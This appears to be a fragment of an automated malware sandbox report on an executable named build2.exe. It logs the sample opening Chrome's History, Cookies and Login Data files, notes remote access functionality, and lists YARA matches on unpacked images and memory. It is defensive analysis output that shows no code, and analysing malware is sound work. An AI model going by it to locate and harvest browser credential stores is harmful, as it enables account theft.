Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: 9.2.build2.exe.1ba15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.build2.exe.1ba15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1502638549.0000000001BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1672621226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY